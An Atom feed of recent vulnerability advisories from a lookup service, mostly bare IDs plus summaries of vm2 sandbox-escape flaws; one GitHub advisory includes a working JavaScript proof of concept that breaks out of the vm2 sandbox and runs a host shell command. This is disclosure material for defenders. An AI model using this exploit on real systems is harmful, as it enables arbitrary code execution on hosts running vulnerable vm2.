<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://cve.radiocsirt.org/rss/recent/all/10</id>
  <title>Most recent entries from all</title>
  <updated>2026-10-03T23:45:14.063292+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>csirt@opendfir.org</email>
  </author>
  <link href="https://cve.radiocsirt.org" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent entries.</subtitle>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/bdu:2026-07027</id>
    <title>bdu:2026-07027</title>
    <updated>2026-10-03T23:45:14.144085+00:00</updated>
    <content>bdu:2026-07027</content>
    <link href="https://cve.radiocsirt.org/vuln/bdu:2026-07027"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/euvd-2026-364314</id>
    <title>EUVD-2026-364314</title>
    <updated>2026-10-03T23:45:14.144143+00:00</updated>
    <content>EUVD-2026-364314</content>
    <link href="https://cve.radiocsirt.org/vuln/euvd-2026-364314"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/fkie_cve-2026-44008</id>
    <title>fkie_cve-2026-44008</title>
    <updated>2026-10-03T23:45:14.144173+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>vm2 is an open source vm/sandbox for Node.js. Prior to 3.11.2, the new method neutralizeArraySpeciesBatch works with objects from the other side but can call into this side via getter on the array prototype exposing objects of the wrong side into the sandbox. This can be used to get host objects and get the host Function object. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system. This vulnerability is fixed in 3.11.2.</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/fkie_cve-2026-44008"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-9qj6-qjgg-37qq</id>
    <title>GHSA-9qj6-qjgg-37qq — vm2 has sandbox breakout via `neutralizeArraySpeciesBatch`</title>
    <updated>2026-10-03T23:45:14.144237+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> npm: vm2</p>
<p>### Summary</p>
<p>VM2 suffers from a sandbox breakout vulnerability. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system.</p>
<p>### Details</p>
<p>The new method `neutralizeArraySpeciesBatch` works with objects from the other side but can call into this side via getter on the array prototype exposing objects of the wrong side into the sandbox. This can be used to get host objects and get the host `Function` object.</p>
<p>### PoC</p>
<p>```js
const {VM} = require("vm2");
const vm = new VM();
console.log(vm.run(`
const a = [];
Object.defineProperty(Array.prototype, 0, {
	set(value) {
		a.f = Buffer.prototype.inspect;
		value.arr.f.constructor.constructor("return process")().mainModule.require('child_process').execSync('touch pwned');
	}
});
new Buffer(a);
`));
```</p>
<p>### Impact</p>
<p>Attackers can perform Remote Code Execution under the assumption that arbitrary code can be executed inside the context of a vm2 sandbox.</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-9qj6-qjgg-37qq"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/rhsa-2026:50850</id>
    <title>RHSA-2026:50850 — Red Hat Security Advisory: Red Hat Ansible Automation Platform 2.1 security update</title>
    <updated>2026-10-03T23:45:14.144312+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>shell-quote: shell-quote: Arbitrary code execution via command injection due to unescaped line terminators vm2: vm2: Arbitrary code execution via sandbox escape vm2: vm2: Remote code execution due to path restriction bypass via symlinks vm2: vm2: Remote code execution via NodeVM builtin allowlist bypass vm2: vm2: Sandbox escape allows direct interaction with host objects vm2: vm2: Sandbox escape leads to Denial of Service vm2: vm2: Information disclosure through unsanitized host paths vm2: vm2: Sandbox escape due to code transformer optimization bypass vm2: vm2: Denial of Service via host memory exhaustion vm2: vm2: Sandbox Escape leading to Arbitrary Code Execution vm2: vm2: Sandbox escape via arbitrary prototype access leading to arbitrary code execution vm2: vm2: Arbitrary code execution via nested NodeVM bypass vm2: vm2: Arbitrary code execution due to sandbox escape vm2: vm2: Arbitrary Code Execution via Sandbox Escape vm2: vm2: Arbitrary Code Execution due to sandbox escape vulnerability vm2: vm2: Arbitrary code execution via sandbox escape vulnerability vm2: vm2: Sandbox escape allows arbitrary code execution on the host system vm2: vm2: Sandbox escape leading to arbitrary code execution via security bypass vm2: vm2: Sandbox escape via internal HTTP built-ins leading to network restriction bypass vm2: vm2: Arbitrary code execution due to incomplete sandbox restrictions vm2: vm2: NodeVM observability builtins leak host process and HTTP request data vm2: vm2: Integrity…</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/rhsa-2026:50850"/>
  </entry>
</feed>
